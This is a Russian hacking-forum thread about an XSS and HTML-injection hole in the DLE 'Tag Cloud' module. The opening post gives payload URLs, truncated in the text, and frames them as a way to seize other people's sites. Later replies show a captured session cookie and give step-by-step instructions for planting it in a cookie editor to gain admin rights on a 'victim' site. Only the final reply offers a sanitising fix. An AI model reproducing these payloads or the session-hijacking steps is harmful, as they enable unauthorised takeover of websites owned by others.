Хак Взлом любого сайта с модулем Облако тегов для DLE - все версии движка

Тема в разделе "DLE", создана пользователем Izrael, 10 мар 2010.

Информация :
Актуальная версия DataLife Engine 12.0
( Final Release v.12.0 | Скачать DataLife Engine | Скачать 12.0 demo )
Нужно ли обновляться | Как обновиться | Изменения в шаблонах
> Нет русских символов <
[Приватная тема DLE (Все подробности в ЛС к модератору раздела)]

Версии 11.3 и ниже - уязвимы!

Локализации | F.A.Q. | Внешний вид
Правила раздела | Правила форума
Обсуждение хайда карается баном!
В каждом сообщении указывайте версию DLE, которого они касаются!
Статус темы:
Закрыта.
Модераторы: killoff
  1. Izrael

    Izrael

    Регистр.:
    12 фев 2008
    Сообщения:
    452
    Симпатии:
    57
    Вычитал в сети.. буквально только что ... что вы думаете на счет этокого ?

    Вот и прило время закрывать дырку пользователям DLE всех версий, кто использует модуль Облако тегов для DLE (на 8.3 кстати представленный по ссылке модуль вообще не работает, но создаёт дырку laughing ) (дырка проуколена на сайтах от 7.5 до 8.3, на более ранние версии не натыкался)
    Простым запросом, в любом браузере - делаем укольчик или что покруче и сайт наш... =)

    Итак приступим:
    У нас два варианта,
    Первый, по HTML, второй через XSS.
    Да, дырка настолько большая что и простой html отрабатывает так как нам нужно.

    вход на сайт XSS:

    http://сайт.ру/engine/classes/tagcl...'+style='font-size:+50pt'>Click me</a></tags>

    вход на сайт простым HTML :

    http://сайт.ру/engine/classes/tagcl...'+style='font-size:+40pt'>Click me</a></tags>
     
  2. o_nix

    o_nix

    Регистр.:
    7 ноя 2007
    Сообщения:
    1.073
    Симпатии:
    1.039
    Izrael так а суть в чём ??
    для самого сайта опасности никакой ...
    flash ниодин поисковик неиндексирует ... разве нетак ?
     
  3. Izrael

    Izrael

    Регистр.:
    12 фев 2008
    Сообщения:
    452
    Симпатии:
    57
    ну не индексирует.. а что тут можно 1000 сайтов с этом модом найти..
    Суть в том что у кого мод этот стоит , снасить его надо **х...
     
  4. tofik228

    tofik228 Читатель

    Заблокирован
    Регистр.:
    3 июн 2008
    Сообщения:
    650
    Симпатии:
    164
    помогите нубу) вот достал я сессию - что мне с этой сессией делать? как попасть в админу по кукису?
    сама сессия
    PHPSESSID=a3c4rqhb2qjrvm0483cc2s5s52; dle_onl_session=a3c4rqhb2qjrvm0483cc2s5s52
     
  5. xex

    xex Постоялец

    Регистр.:
    13 июн 2007
    Сообщения:
    68
    Симпатии:
    5
    любым редактором кук.. например для фаяфокса ставишь дополенине Add N Edit Cookies+
    заходишь на сайт жертвы.. потом Инструменты/Редактор Cookies и в нем вбиваешь файт жертвы и фильтруешь.. находишь PHPSESSID и меняешь на тот хеш который ты выловил - сохраняешь. . ну и если куки с именем dle_onl_session нет, то создаешь ее дав ей это имя и хеш тот что выловил в узел ясное дело пишешь сайт в путь / т.е. ничего особенно т.е. как на примере куки PHPSESSID - сохраняешь и проверяшь свои права на сайте жертвы.. стал ли ты админом ;)
     
    tofik228 нравится это.
  6. tofik228

    tofik228 Читатель

    Заблокирован
    Регистр.:
    3 июн 2008
    Сообщения:
    650
    Симпатии:
    164
    что то проделываю это и в конце выдает - Hacking attempt!
     
  7. TheFosT

    TheFosT Писатель

    Регистр.:
    9 фев 2010
    Сообщения:
    9
    Симпатии:
    0
    я что то ваще не понял, ну ввел я эту ссылку, открыло один большой ТЕГ летает "Clic Me"
    что дальше делать?
     
  8. xa12kep

    xa12kep Создатель

    Регистр.:
    6 мар 2010
    Сообщения:
    20
    Симпатии:
    1
    Ну во первых сессия долго не живет, это раз, во вторых, вам все равно нужен хэш пароля из кукисов. Одной сессии маловато будет.
     
  9. i.m.p

    i.m.p Писатель

    Регистр.:
    4 июн 2009
    Сообщения:
    8
    Симпатии:
    0
    а дырку можно закрыть? или сносить мод? жаль был отличный мод!
     
  10. -=BlackSmoke=-

    -=BlackSmoke=-

    Регистр.:
    4 авг 2009
    Сообщения:
    280
    Симпатии:
    49
    i.m.p, заинглудь в файл класс парсинга входящих данных(parse.class.php) и с помощью него сделай фильтрацию. Что-то типа
    $tags = $db->safesql( htmlspecialchars( strip_tags( stripslashes( trim( $_GET['tagcloud'] ) ) ), ENT_QUOTES ) );
     
Статус темы:
Закрыта.